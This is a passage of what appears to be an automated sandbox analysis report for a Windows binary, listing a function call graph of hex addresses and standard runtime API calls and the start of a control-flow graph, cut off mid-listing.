7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57059->57073 57074 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57060->57074 57066->57057 57072 7ff8a877d2e0 5 API calls new[] 57066->57072 57068 7ff8a87628b9 57067->57068 57070 7ff8a87628c5 57067->57070 57075 7ff8a87627d0 57068->57075 57070->57058 57071->57066 57072->57057 57073->57064 57074->57064 57076 7ff8a876280a 57075->57076 57079 7ff8a8762817 57075->57079 57081 7ff8a8762310 57076->57081 57078 7ff8a876286d 57078->57070 57079->57078 57080 7ff8a8762310 42 API calls 57079->57080 57080->57079 57111 7ff8a8762010 57081->57111 57083 7ff8a87623f7 57086 7ff8a880abc0 4 API calls 57083->57086 57084 7ff8a8762791 57190 7ff8a873fb70 6 API calls 57084->57190 57088 7ff8a87627b1 57086->57088 57088->57079 57089 7ff8a87623cc 57089->57083 57093 7ff8a87624b8 57089->57093 57097 7ff8a8762487 57089->57097 57142 7ff8a8702ba0 57089->57142 57091 7ff8a8762451 57092 7ff8a8762457 57091->57092 57091->57093 57092->57097 57179 7ff8a86e69f0 57092->57179 57095 7ff8a876255a 57093->57095 57099 7ff8a8762520 57093->57099 57096 7ff8a86e69f0 4 API calls 57095->57096 57107 7ff8a8762540 57096->57107 57097->57083 57097->57084 57189 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57097->57189 57098 7ff8a8762633 57100 7ff8a86e69f0 4 API calls 57098->57100 57099->57098 57101 7ff8a8762679 57099->57101 57099->57107 57100->57107 57150 7ff8a86e92e0 57101->57150 57106 7ff8a87626dd 57108 7ff8a876270b 57106->57108 57186 7ff8a873cc40 42 API calls 57106->57186 57107->57097 57188 7ff8a8703f60 28 API calls 57107->57188 57108->57107 57187 7ff8a873fc00 6 API calls 57108->57187 57112 7ff8a87622c3 57111->57112 57113 7ff8a8762032 57111->57113 57112->57089 57114 7ff8a876203b 57113->57114 57118 7ff8a8762053 57113->57118 57235 7ff8a8761f00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57114->57235 57116 7ff8a8762046 57116->57089 57119 7ff8a876223d 57118->57119 57120 7ff8a8762092 57118->57120 57119->57112 57242 7ff8a8761f00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57119->57242 57121 7ff8a87620e4 57120->57121 57236 7ff8a8761f00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57120->57236 57191 7ff8a8762bb0 00007FF8BA251730 57121->57191 57124 7ff8a87621dc 57224 7ff8a8714a40 36 API calls 57124->57224 57125 7ff8a8762196 57240 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57125->57240 57128 7ff8a8762149 57237 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57128->57237 57130 7ff8a87621a5 57241 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57130->57241 57131 7ff8a8762151 57131->57112 57131->57124 57131->57125 57132 7ff8a8762153 57132->57131 57238 7ff8a87a09d0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57132->57238 57136 7ff8a87621cd 57136->57089 57137 7ff8a8762164 57239 7ff8a8761f00 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57137->57239 57139 7ff8a8762208 57225 7ff8a879f120 57139->57225 57141 7ff8a876222e 57141->57089 57146 7ff8a8702bd7 57142->57146 57143 7ff8a8702c39 57143->57091 57146->57143 57148 7ff8a8702df5 57146->57148 57324 7ff8a8702780 57146->57324 57338 7ff8a8702ad0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57146->57338 57339 7ff8a86f6ff0 22 API calls 57146->57339 57148->57143 57340 7ff8a86fb080 6 API calls new[] 57148->57340 57404 7ff8a86e9210 57150->57404 57153 7ff8a875b060 57154 7ff8a875b096 57153->57154 57155 7ff8a875b08d 57153->57155 57154->57155 57175 7ff8a875b100 57154->57175 57457 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57155->57457 57157 7ff8a875b0c5 57458 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57157->57458 57159 7ff8a875b0ef 57159->57106 57163 7ff8a875b52d 57165 7ff8a875b5d5 57163->57165 57465 7ff8a87a09d0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57163->57465 57165->57106 57167 7ff8a875b5cd 57167->57165 57169 7ff8a86e62e0 new[] 4 API calls 57167->57169 57168 7ff8a86e69f0 4 API calls 57168->57175 57169->57165 57170 7ff8a875b566 57171 7ff8a875b50a 57170->57171 57464 7ff8a8714a40 36 API calls 57170->57464 57171->57163 57462 7ff8a8714a40 36 API calls 57171->57462 57175->57168 57175->57170 57175->57171 57176 7ff8a875b554 57175->57176 57178 7ff8a8762010 42 API calls 57175->57178 57425 7ff8a8763160 57175->57425 57437 7ff8a8717e80 57175->57437 57459 7ff8a8718f10 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57175->57459 57460 7ff8a8710690 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57175->57460 57461 7ff8a8714a40 36 API calls 57175->57461 57463 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57176->57463 57178->57175 57180 7ff8a86e69b0 57179->57180 57181 7ff8a86e6a1d 57180->57181 57182 7ff8a86e62e0 new[] 4 API calls 57180->57182 57181->57097 57183 7ff8a86e69c5 57182->57183 57184 7ff8a86e69d5 57183->57184 57503 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57183->57503 57184->57097 57186->57108 57187->57107 57188->57097 57189->57084 57190->57083 57192 7ff8a8762c80 57191->57192 57193 7ff8a8762c9b 57192->57193 57209 7ff8a8762cb9 57192->57209 57261 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57193->57261 57196 7ff8a8762e6d 57243 7ff8a879ccb0 57196->57243 57198 7ff8a8763136 57201 7ff8a880abc0 4 API calls 57198->57201 57199 7ff8a8762ddd 57202 7ff8a8762e0e 57199->57202 57203 7ff8a8762de6 57199->57203 57200 7ff8a8762da7 57200->57196 57200->57199 57205 7ff8a8762120 57201->57205 57207 7ff8a86e69f0 4 API calls 57202->57207 57208 7ff8a8762e46 57202->57208 57263 7ff8a86ea3b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57203->57263 57205->57128 57205->57131 57205->57132 57206 7ff8a8762ecf 57212 7ff8a8762f00 57206->57212 57215 7ff8a8762cac 57206->57215 57220 7ff8a8702ba0 30 API calls 57206->57220 57264 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57206->57264 57265 7ff8a873fb70 6 API calls 57206->57265 57266 7ff8a8703f60 28 API calls 57206->57266 57214 7ff8a8762e1f 57207->57214 57208->57206 57213 7ff8a86e69f0 4 API calls 57208->57213 57209->57200 57211 7ff8a8762d82 57209->57211 57210 7ff8a8763064 57210->57215 57268 7ff8a86ea3b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57210->57268 57262 7ff8a86ea3b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57211->57262 57212->57210 57267 7ff8a8714a40 36 API calls 57212->57267 57213->57206 57214->57208 57218 7ff8a879ccb0 5 API calls 57214->57218 57269 7ff8a8762900 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57215->57269 57218->57208 57220->57206 57224->57139 57227 7ff8a879f135 57225->57227 57234 7ff8a879f338 57225->57234 57227->57234 57288 7ff8a879f530 57227->57288 57228 7ff8a879f1e1 57233 7ff8a879f1f8 57228->57233 57300 7ff8a8749630 6 API calls 57228->57300 57231 7ff8a879f18d 57231->57228 57294 7ff8a8701fc0 57231->57294 57233->57234 57301 7ff8a8740020 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57233->57301 57234->57141 57235->57116 57236->57121 57237->57131 57238->57137 57239->57131 57240->57130 57241->57136 57242->57112 57245 7ff8a879cd01 57243->57245 57246 7ff8a879d00e 57245->57246 57249 7ff8a879d0c9 57245->57249 57270 7ff8a879c100 57245->57270 57248 7ff8a879d13d 57246->57248 57252 7ff8a86e92e0 4 API calls 57246->57252 57255 7ff8a879d120 57246->57255 57251 7ff8a879d1de 57248->57251 57282 7ff8a8740020 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57248->57282 57280 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57249->57280 57259 7ff8a879d237 57251->57259 57283 7ff8a8772d70 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57251->57283 57252->57255 57253 7ff8a880abc0 4 API calls 57256 7ff8a879d280 57253->57256 57281 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57255->57281 57256->57208 57258 7ff8a879d205 57258->57259 57284 7ff8a872bb70 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57258->57284 57259->57253 57261->57215 57262->57215 57263->57215 57264->57206 57265->57206 57266->57206 57267->57210 57268->57215 57269->57198 57271 7ff8a879c144 57270->57271 57272 7ff8a879c222 57271->57272 57273 7ff8a879c267 57271->57273 57279 7ff8a879c240 57272->57279 57285 7ff8a8799370 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57272->57285 57274 7ff8a879c29b 57273->57274 57275 7ff8a879c2ae 57273->57275 57273->57279 57286 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57274->57286 57287 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57275->57287 57279->57245 57280->57246 57281->57248 57283->57258 57284->57259 57285->57279 57286->57279 57287->57279 57290 7ff8a879f55f 57288->57290 57289 7ff8a879f5cf 57293 7ff8a879f634 57289->57293 57314 7ff8a873fc00 6 API calls 57289->57314 57290->57289 57302 7ff8a87040d0 57290->57302 57293->57231 57295 7ff8a8701fd8 57294->57295 57296 7ff8a87040d0 23 API calls 57295->57296 57298 7ff8a8701ff3 57296->57298 57297 7ff8a86f87b0 25 API calls 57299 7ff8a87020c5 57297->57299 57298->57297 57298->57299 57299->57231 57300->57233 57303 7ff8a87040f7 57302->57303 57305 7ff8a870411c 57303->57305 57319 7ff8a86ff640 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57303->57319 57307 7ff8a8704140 57305->57307 57320 7ff8a8703fc0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57305->57320 57311 7ff8a87041dd 57307->57311 57321 7ff8a86faf90 22 API calls 57307->57321 57310 7ff8a87041fa 57310->57290 57315 7ff8a8703c80 57311->57315 57312 7ff8a8704157 57312->57311 57322 7ff8a86f6ff0 22 API calls 57312->57322 57314->57293 57318 7ff8a8703cad 57315->57318 57316 7ff8a8703cba 57316->57310 57318->57316 57323 7ff8a86f6ff0 22 API calls 57318->57323 57319->57305 57320->57307 57321->57312 57341 7ff8a86f9ab0 57324->57341 57327 7ff8a8702969 57331 7ff8a87028b4 57327->57331 57387 7ff8a86f6ff0 22 API calls 57327->57387 57331->57146 57332 7ff8a87028a4 57332->57327 57332->57331 57333 7ff8a8702947 57332->57333 57335 7ff8a8702917 57332->57335 57333->57327 57386 7ff8a87a2590 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57333->57386 57385 7ff8a86f85d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57335->57385 57338->57146 57340->57143 57342 7ff8a86f9d67 57341->57342 57353 7ff8a86f9ae0 57341->57353 57346 7ff8a86f9e0e 57342->57346 57391 7ff8a86fe140 8 API calls 57342->57391 57343 7ff8a86f9b7e 57347 7ff8a880abc0 4 API calls 57343->57347 57345 7ff8a86f6a40 00007FF8BA251730 57345->57343 57346->57343 57346->57345 57348 7ff8a86f9e69 57347->57348 57348->57331 57365 7ff8a86f9e80 57348->57365 57349 7ff8a86f9ca8 57355 7ff8a86f9ccd 57349->57355 57364 7ff8a86edc50 11 API calls 57349->57364 57350 7ff8a86f9b71 57354 7ff8a86f6a40 00007FF8BA251730 57350->57354 57351 7ff8a86f9dc9 57351->57346 57351->57351 57352 7ff8a86f40e0 00007FF8BA251730 57351->57352 57352->57346 57353->57342 57353->57346 57353->57349 57353->57350 57360 7ff8a86f9b83 57353->57360 57354->57343 57355->57342 57355->57346 57390 7ff8a86fb7f0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57355->57390 57356 7ff8a86f9c75 57356->57349 57357 7ff8a86f9c94 57356->57357 57362 7ff8a86f6a40 00007FF8BA251730 57357->57362 57358 7ff8a86f9c32 57358->57356 57358->57357 57389 7ff8a86f7890 9 API calls 57358->57389 57360->57346 57360->57358 57388 7ff8a87a25d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57360->57388 57362->57343 57364->57355 57366 7ff8a86f9ea2 57365->57366 57369 7ff8a86f9ed5 57365->57369 57398 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57366->57398 57368 7ff8a86f9f0d 57370 7ff8a86f9ece 57368->57370 57400 7ff8a86f6ff0 22 API calls 57368->57400 57369->57368 57369->57370 57371 7ff8a86fa050 57369->57371 57372 7ff8a86f9ff8 57369->57372 57370->57327 57370->57331 57370->57332 57384 7ff8a86fb7f0 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57370->57384 57374 7ff8a86fa07e 57371->57374 57376 7ff8a86fa068 57371->57376 57399 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57372->57399 57374->57368 57379 7ff8a86fa09a 57374->57379 57392 7ff8a86f7c40 57376->57392 57377 7ff8a86fa0d5 00007FF8BA251730 57377->57370 57379->57377 57380 7ff8a86fa0bd 57379->57380 57401 7ff8a86f31c0 6 API calls new[] 57379->57401 57402 7ff8a86f66f0 8 API calls new[] 57380->57402 57383 7ff8a86fa0c7 57383->57377 57384->57332 57385->57331 57386->57327 57388->57358 57389->57356 57390->57342 57391->57351 57393 7ff8a86f7c6f 57392->57393 57394 7ff8a86f7c7c 57392->57394 57403 7ff8a86fe520 6 API calls 57393->57403 57396 7ff8a86f7c8c 57394->57396 57397 7ff8a86edc50 11 API calls 57394->57397 57396->57368 57397->57396 57398->57370 57399->57368 57401->57380 57402->57383 57403->57394 57413 7ff8a86e7030 57404->57413 57406 7ff8a86e9296 57407 7ff8a86e92af 57406->57407 57422 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57406->57422 57409 7ff8a880abc0 4 API calls 57407->57409 57412 7ff8a86e92c2 57409->57412 57412->57153 57417 7ff8a86e707c 57413->57417 57414 7ff8a86e87bc 57415 7ff8a880abc0 4 API calls 57414->57415 57416 7ff8a86e87f7 57415->57416 57416->57406 57421 7ff8a86e8e30 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 57416->57421 57417->57414 57420 7ff8a86e7118 57417->57420 57423 7ff8a86e8d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57417->57423 57420->57414 57424 7ff8a86e8d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57420->57424 57421->57406 57422->57407 57423->57420 57424->57414 57426 7ff8a87631ee 57425->57426 57427 7ff8a8763198 57425->57427 57426->57427 57428 7ff8a8763210 57426->57428 57466 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57427->57466 57430 7ff8a87631b0 57428->57430 57435 7ff8a8763215 57428->57435 57467 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57430->57467 57432 7ff8a87631da 57432->57175 57433 7ff8a8762bb0 41 API calls 57433->57435 57434 7ff8a876330d 57434->57175 57435->57433 57435->57434 57468 7ff8a8749630 6 API calls 57435->57468 57438 7ff8a8717e94 57437->57438 57439 7ff8a8717ea5 57437->57439 57484 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57438->57484 57440 7ff8a8717ebb 57439->57440 57485 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57439->57485 57442 7ff8a8717ea3 57440->57442 57444 7ff8a8717eff 57440->57444 57486 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57442->57486 57469 7ff8a8717bf0 57444->57469 57446 7ff8a8717ef2 57446->57175 57450 7ff8a8717f79 57455 7ff8a8717f85 57450->57455 57489 7ff8a8710690 00007FF8BA251730 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57450->57489 57451 7ff8a8717f23 57451->57450 57453 7ff8a8717bf0 36 API calls 57451->57453 57454 7ff8a8717f74 57451->57454 57487 7ff8a8763380 41 API calls 57451->57487 57488 7ff8a8716d60 36 API calls 57451->57488 57453->57451 57454->57175 57455->57454 57456 7ff8a86e69f0 4 API calls 57455->57456 57456->57454 57457->57157 57458->57159 57459->57175 57460->57175 57461->57175 57462->57163 57463->57171 57464->57171 57465->57167 57466->57430 57467->57432 57468->57435 57470 7ff8a8717c65 57469->57470 57479 7ff8a8717c0d 57469->57479 57471 7ff8a8717cde 57470->57471 57472 7ff8a8717ce5 57470->57472 57499 7ff8a8712f50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57471->57499 57490 7ff8a871abe0 57472->57490 57473 7ff8a8717c2c 57473->57470 57476 7ff8a8717c35 57473->57476 57483 7ff8a8717cfd 57476->57483 57498 7ff8a8714940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57476->57498 57479->57470 57479->57473 57497 7ff8a8716d60 36 API calls 57479->57497 57480 7ff8a8717c56 57480->57451 57481 7ff8a8717ce3 57481->57483 57500 7ff8a8714940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57481->57500 57483->57451 57484->57442 57485->57440 57486->57446 57487->57451 57488->57451 57489->57455 57491 7ff8a871ac6f 57490->57491 57496 7ff8a871acdc 57491->57496 57501 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57491->57501 57493 7ff8a87212eb 57502 7ff8a8710f90 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57493->57502 57495 7ff8a87212fa 57495->57481 57496->57481 57497->57479 57498->57480 57499->57481 57500->57483 57501->57493 57502->57495 57503->57184 57504 7ff8a87411d0 57508 7ff8a874120f 57504->57508 57517 7ff8a8741627 57504->57517 57505 7ff8a86e69f0 4 API calls 57506 7ff8a87414f3 57505->57506 57514 7ff8a874151b 57506->57514 57506->57517 57529 7ff8a8736bd0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 57506->57529 57508->57505 57509 7ff8a874166e 57510 7ff8a8741688 57509->57510 57511 7ff8a8741695 57509->57511 57512 7ff8a86e69f0 4 API calls 57510->57512 57511->57517 57518 7ff8a86e6ab0 57511->57518 57512->57517 57514->57509 57515 7ff8a8741613 57514->57515 57530 7ff8a86ea550 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57515->57530 57519 7ff8a86e6b61 57518->57519 57520 7ff8a86e6aca 57518->57520 57519->57517 57521 7ff8a86e6b38 57520->57521 57523 7ff8a86e6adc 57520->57523 57522 7ff8a86e6740 4 API calls 57521->57522 57524 7ff8a86e6b43 57522->57524 57525 7ff8a86e69f0 4 API calls 57523->57525 57528 7ff8a86e6ae9 57524->57528 57531 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57524->57531 57525->57528 57527 7ff8a86e6b53 57527->57517 57528->57517 57529->57514 57530->57517 57531->57527 57532 7ff8a871e9e7 57533 7ff8a871ea0c 57532->57533 57534 7ff8a871ea21 57532->57534 57572 7ff8a8725690 11 API calls 57533->57572 57553 7ff8a8705070 57534->57553 57539 7ff8a8720437 57540 7ff8a871ea18 57540->57539 57543 7ff8a8720dda 57540->57543 57573 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57540->57573 57542 7ff8a8721376 57575 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57542->57575 57543->57542 57574 7ff8a8710f90 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57543->57574 57546 7ff8a87213c8 57547 7ff8a87213da 57546->57547 57576 7ff8a87145a0 36 API calls 57546->57576 57549 7ff8a87213eb 57547->57549 57577 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57547->57577 57552 7ff8a8720e70 57549->57552 57578 7ff8a873fb70 6 API calls 57549->57578 57555 7ff8a8705145 57553->57555 57558 7ff8a8705097 57553->57558 57554 7ff8a870514a 57554->57540 57565 7ff8a8705260 57554->57565 57555->57554 57579 7ff8a87012f0 57555->57579 57557 7ff8a870521c 57590 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57557->57590 57558->57554 57558->57557 57560 7ff8a870509d 57558->57560 57560->57554 57561 7ff8a87051e7 57560->57561 57562 7ff8a87051f3 57560->57562 57588 7ff8a87a2590 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57561->57588 57589 7ff8a8704e60 25 API calls 57562->57589 57570 7ff8a8705283 57565->57570 57566 7ff8a87053e8 57594 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57566->57594 57567 7ff8a87012f0 25 API calls 57567->57570 57569 7ff8a87053d0 57569->57540 57570->57566 57570->57567 57570->57569 57593 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57570->57593 57572->57540 57573->57543 57574->57542 57575->57546 57576->57547 57577->57549 57578->57552 57580 7ff8a8701354 57579->57580 57581 7ff8a870130d 57579->57581 57587 7ff8a86f9e80 25 API calls 57580->57587 57591 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57581->57591 57583 7ff8a870133e 57583->57558 57584 7ff8a8701365 57586 7ff8a8701369 57584->57586 57592 7ff8a8700fc0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57584->57592 57586->57558 57587->57584 57588->57554 57589->57554 57590->57554 57591->57583 57592->57586 57593->57570 57594->57569

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 844 7ff8a86f9060-7ff8a86f90eb 845 7ff8a86f9244-7ff8a86f925a 844->845 846 7ff8a86f90f1-7ff8a86f90fb 844->846 848 7ff8a86f9156-7ff8a86f919c call 7ff8a86e62e0 845->848 849 7ff8a86f9260-7ff8a86f9266 845->849 846->845 847 7ff8a86f9101-7ff8a86f9104 846->847 847->849 851 7ff8a86f910a 847->851 857 7ff8a86f91a2-7ff8a86f9206 00007FF8BA251730 848->857 858 7ff8a86f9839-7ff8a86f983c 848->858 849->848 852 7ff8a86f926c-7ff8a86f9282 call 7ff8a86e62e0 849->852 854 7ff8a86f9111-7ff8a86f911a 851->854 860 7ff8a86f9899 852->860 861 7ff8a86f9288-7ff8a86f92a4 852->861 854->854 859 7ff8a86f911c-7ff8a86f912b call 7ff8a86e62e0 854->859 862 7ff8a86f9441-7ff8a86f945c 857->862 863 7ff8a86f920c-7ff8a86f9228 call 7ff8a880bb74 857->863 858->860 864 7ff8a86f983e-7ff8a86f9845 858->864 859->860 880 7ff8a86f9131-7ff8a86f9140 call 7ff8a880bb74 859->880 867 7ff8a86f989e-7ff8a86f98ae 860->867 881 7ff8a86f92a6-7ff8a86f92b3 861->881 882 7ff8a86f92ba 861->882 868 7ff8a86f94be-7ff8a86f94d8 862->868 869 7ff8a86f945e-7ff8a86f9461 862->869 883 7ff8a86f922e-7ff8a86f923f call 7ff8a880bb74 863->883 884 7ff8a86f93ec 863->884 870 7ff8a86f9847-7ff8a86f9851 864->870 871 7ff8a86f9890 864->871 875 7ff8a86f95ee 868->875 876 7ff8a86f94de-7ff8a86f94e3 868->876 869->868 877 7ff8a86f9463-7ff8a86f946a 869->877 878 7ff8a86f9853 870->878 879 7ff8a86f9859-7ff8a86f9886 870->879 871->860 885 7ff8a86f95f3-7ff8a86f9601 875->885 876->875 886 7ff8a86f94e9-7ff8a86f9515 call 7ff8a86f0250 876->886 887 7ff8a86f94b5 877->887 888 7ff8a86f946c-7ff8a86f9476 877->888 878->879 879->860 917 7ff8a86f9888-7ff8a86f988e 879->917 898 7ff8a86f9147-7ff8a86f914e 880->898 881->882 892 7ff8a86f92c1-7ff8a86f92c8 882->892 891 7ff8a86f93ef-7ff8a86f943f call 7ff8a880bb74 * 2 883->891 884->891 894 7ff8a86f9604-7ff8a86f9607 885->894 904 7ff8a86f9518-7ff8a86f9538 886->904 887->868 895 7ff8a86f947e-7ff8a86f94ab 888->895 896 7ff8a86f9478 888->896 891->869 892->892 900 7ff8a86f92ca-7ff8a86f92d8 892->900 902 7ff8a86f96b6-7ff8a86f96c0 894->902 903 7ff8a86f960d-7ff8a86f9626 call 7ff8a86f85d0 894->903 895->868 936 7ff8a86f94ad-7ff8a86f94b3 895->936 896->895 898->898 905 7ff8a86f9150 898->905 911 7ff8a86f92e0-7ff8a86f92e7 900->911 908 7ff8a86f96c2-7ff8a86f96cb 902->908 909 7ff8a86f96ce-7ff8a86f96e1 call 7ff8a86f4510 902->909 903->902 929 7ff8a86f962c-7ff8a86f96b0 903->929 913 7ff8a86f953e-7ff8a86f9548 904->913 914 7ff8a86f95e9-7ff8a86f95ec 904->914 905->848 908->909 937 7ff8a86f96e7-7ff8a86f96f1 909->937 938 7ff8a86f982b-7ff8a86f9837 909->938 911->911 920 7ff8a86f92e9-7ff8a86f9300 911->920 915 7ff8a86f954e-7ff8a86f9551 913->915 916 7ff8a86f954a-7ff8a86f954c 913->916 914->894 922 7ff8a86f9553-7ff8a86f955b 915->922 916->922 917->860 927 7ff8a86f9357-7ff8a86f935e 920->927 928 7ff8a86f9302-7ff8a86f9306 920->928 933 7ff8a86f957f-7ff8a86f9595 call 7ff8a87a3550 922->933 934 7ff8a86f955d-7ff8a86f9571 call 7ff8a86f7800 922->934 930 7ff8a86f9383-7ff8a86f938a 927->930 931 7ff8a86f9360-7ff8a86f9368 927->931 939 7ff8a86f9310-7ff8a86f9317 928->939 949 7ff8a86f9714-7ff8a86f971a 929->949 950 7ff8a86f96b2 929->950 942 7ff8a86f938c-7ff8a86f9396 930->942 943 7ff8a86f93db 930->943 931->848 941 7ff8a86f936e-7ff8a86f937d call 7ff8a87a25d0 931->941 964 7ff8a86f9597-7ff8a86f95ab call 7ff8a875bff0 933->964 965 7ff8a86f95ad 933->965 934->933 963 7ff8a86f9573-7ff8a86f9578 934->963 936->868 946 7ff8a86f96f3 937->946 947 7ff8a86f96f9-7ff8a86f970c 937->947 938->867 948 7ff8a86f9320-7ff8a86f9329 939->948 941->848 941->930 952 7ff8a86f939e-7ff8a86f93cb 942->952 953 7ff8a86f9398 942->953 962 7ff8a86f93e4-7ff8a86f93e7 943->962 946->947 947->949 948->948 958 7ff8a86f932b-7ff8a86f9339 948->958 959 7ff8a86f9743-7ff8a86f9753 949->959 960 7ff8a86f971c-7ff8a86f973f 949->960 950->902 952->962 983 7ff8a86f93cd-7ff8a86f93d6 952->983 953->952 966 7ff8a86f9340-7ff8a86f9349 958->966 977 